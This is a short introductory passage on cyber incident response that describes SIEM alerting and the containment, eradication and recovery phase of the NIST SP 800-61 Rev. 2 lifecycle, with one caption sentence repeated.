Containment, Eradication, and Recovery

A triggered alert in a Security Information and Event Management (SIEM) console represents a single point in time, but a cyber incident is a fluid, expanding dynamic system.

A typical SIEM infrastructure aggregates and correlates logs from multiple sources to generate the initial point-in-time alerts that trigger incident response.
A typical SIEM infrastructure aggregates and correlates logs from multiple sources to generate the initial point-in-time alerts that trigger incident response.

When malicious code executes in memory or an adversary pivots across an environment, operational survival depends on methodical, heavily structured frameworks rather than improvised reactions. The National Institute of Standards and Technology Special Publication 800-61 Revision 2 defines a strict four-phase incident response lifecycle to govern this process. While preparation and initial detection are critical, the battle is truly fought and won in the third phase: Containment, Eradication, and Recovery.